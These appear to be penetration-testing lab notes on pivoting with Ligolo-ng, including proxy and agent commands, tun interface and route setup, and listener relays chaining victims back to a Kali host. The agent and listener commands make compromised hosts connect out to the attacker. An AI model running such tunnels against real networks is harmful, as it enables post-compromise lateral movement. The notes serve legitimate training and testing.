Port Forwarding

Ligolo

Starting listener server

./proxy -laddr 192.168.146.158:5555 -selfcert

Connecting from victim back to kali

./agent -connect 192.168.45.223:11601 -ignore-cert

Creating a new interface

sudo ip tuntap add user $(whoami) mode tun ligolo2 ; sudo ip link set ligolo2 up

# Adding routes
sudo ip r add 10.4.216.0/24 dev ligolo2

Connecting to newly added connection

ligolo-ng ยป session
? Specify a session : 1 - #1 - CRAFT2\apache@CRAFT2 - 192.168.230.188:49785
[Agent : CRAFT2\apache@CRAFT2] ยป ifconfig
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Interface 0                                   โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Name         โ”‚ Ethernet0 2                    โ”‚
โ”‚ Hardware MAC โ”‚ 00:50:56:ab:d7:a7              โ”‚
โ”‚ MTU          โ”‚ 1500                           โ”‚
โ”‚ Flags        โ”‚ up|broadcast|multicast|running โ”‚
โ”‚ IPv4 Address โ”‚ 192.168.230.188/24             โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Interface 1                                  โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Name         โ”‚ Loopback Pseudo-Interface 1   โ”‚
โ”‚ Hardware MAC โ”‚                               โ”‚
โ”‚ MTU          โ”‚ -1                            โ”‚
โ”‚ Flags        โ”‚ up|loopback|multicast|running โ”‚
โ”‚ IPv6 Address โ”‚ ::1/128                       โ”‚
โ”‚ IPv4 Address โ”‚ 127.0.0.1/8                   โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
[Agent : CRAFT2\apache@CRAFT2] ยป start --tun craft2-pv
[Agent : CRAFT2\apache@CRAFT2] ยป INFO[0307] Starting tunnel to CRAFT2\apache@CRAFT2

Connecting to victim local server port

sudo ip tuntap add user $(whoami) mode tun craft2-pv ; sudo ip link set craft2-pv up
sudo ip r add 240.0.0.1/32 dev craft2-pv

Connecting to another multiple internal network

[Agent : confluence@confluence01] ยป listener_add --addr 0.0.0.0:8888 --to 192.168.45.223:8080  --tcp

anything connects to port 8080 on victim will connect back to us on port 8888

  • first victim listen on port 8888

  • redirect all received traffic to kali server port 8080

  • second victim connect to first victim on port 8888

  • traffic will be redirected back to kali server

agent.exe -connect 192.168.26.131:8888 -ignore-cert

https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b

https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683 https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#chisel

PreviousPost CompromiseNextPlayground Setup

Last updated

Was this helpful?